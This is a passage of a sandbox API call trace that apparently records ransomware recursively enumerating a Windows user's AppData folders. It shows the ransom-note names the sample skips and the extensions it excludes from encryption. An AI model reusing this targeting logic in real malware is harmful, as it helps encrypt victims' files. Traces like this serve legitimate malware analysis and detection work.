ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P7Y3F7QB", cAlternateFileName="")) returned 1 [0081.008] lstrcmpW (lpString1="P7Y3F7QB", lpString2=".") returned 1 [0081.009] lstrcmpW (lpString1="P7Y3F7QB", lpString2="..") returned 1 [0081.009] lstrlenW (lpString="P7Y3F7QB") returned 8 [0081.009] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="P7Y3F7QB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB" [0081.009] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" [0081.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0081.009] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.010] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.012] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.012] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.012] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.012] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.012] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.012] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d241020, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d241020, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 1 [0081.012] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0081.012] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0081.013] lstrlenW (lpString="macromedia.com") returned 14 [0081.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="macromedia.com" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0081.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0081.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0081.013] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.016] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d241020, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d241020, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.019] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.019] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 1 [0081.019] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0081.019] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0081.019] lstrlenW (lpString="support") returned 7 [0081.019] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="support" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0081.019] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0081.019] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0081.020] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.154] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.156] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.156] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.156] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 1 [0081.156] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0081.156] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0081.156] lstrlenW (lpString="flashplayer") returned 11 [0081.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="flashplayer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0081.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0081.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0081.157] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x76c980 [0081.158] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.158] FindNextFileW (in: hFindFile=0x76c980, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.159] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.159] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.159] FindNextFileW (in: hFindFile=0x76c980, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 1 [0081.159] lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0081.159] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0081.159] lstrlenW (lpString="sys") returned 3 [0081.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="sys" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0081.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0081.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0081.159] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x76c008 [0081.160] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.160] FindNextFileW (in: hFindFile=0x76c008, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.162] FindNextFileW (in: hFindFile=0x76c008, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 1 [0081.162] lstrcmpW (lpString1="settings.sol", lpString2=".") returned 1 [0081.162] lstrcmpW (lpString1="settings.sol", lpString2="..") returned 1 [0081.162] lstrcmpiW (lpString1="settings.sol", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.162] lstrcmpiW (lpString1="settings.sol", lpString2="Decryptor_Info.hta") returned 1 [0081.162] PathFindExtensionW (pszPath="settings.sol") returned=".sol" [0081.162] lstrcmpiW (lpString1=".sol", lpString2=".exe") returned 1 [0081.162] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0081.162] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0081.162] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0081.162] lstrcmpiW (lpString1=".sol", lpString2=".msi") returned 1 [0081.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x76c048 [0081.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x77c9c8 [0081.162] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c048 | out: hHeap=0x6d0000) returned 1 [0081.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x76c048 [0081.162] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c9c8 | out: hHeap=0x6d0000) returned 1 [0081.162] FindNextFileW (in: hFindFile=0x76c008, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0081.162] FindClose (in: hFindFile=0x76c008 | out: hFindFile=0x76c008) returned 1 [0081.162] FindNextFileW (in: hFindFile=0x76c980, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0081.163] FindClose (in: hFindFile=0x76c980 | out: hFindFile=0x76c980) returned 1 [0081.164] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0081.164] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.165] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0081.165] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.165] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0081.165] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.165] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0081.165] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0081.165] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b135100, ftCreationTime.dwHighDateTime=0x1d62227, ftLastAccessTime.dwLowDateTime=0x1b135100, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x39dae700, ftLastWriteTime.dwHighDateTime=0x1d62200, nFileSizeHigh=0x0, nFileSizeLow=0x93400, dwReserved0=0x0, dwReserved1=0x0, cFileName="mhtop32bit.exe", cAlternateFileName="MHTOP3~1.EXE")) returned 1 [0081.165] lstrcmpW (lpString1="mhtop32bit.exe", lpString2=".") returned 1 [0081.165] lstrcmpW (lpString1="mhtop32bit.exe", lpString2="..") returned 1 [0081.165] lstrcmpiW (lpString1="mhtop32bit.exe", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.165] lstrcmpiW (lpString1="mhtop32bit.exe", lpString2="Decryptor_Info.hta") returned 1 [0081.166] PathFindExtensionW (pszPath="mhtop32bit.exe") returned=".exe" [0081.166] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0081.166] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0081.166] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0081.166] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0081.166] lstrlenW (lpString="Microsoft") returned 9 [0081.166] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0081.166] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" [0081.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0081.166] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0081.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.166] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.166] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.166] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x7c36290, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x7c36290, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0081.167] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0081.167] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0081.167] lstrlenW (lpString="AddIns") returned 6 [0081.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="AddIns" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns" [0081.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" [0081.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0081.167] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.168] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x7c36290, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x7c36290, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 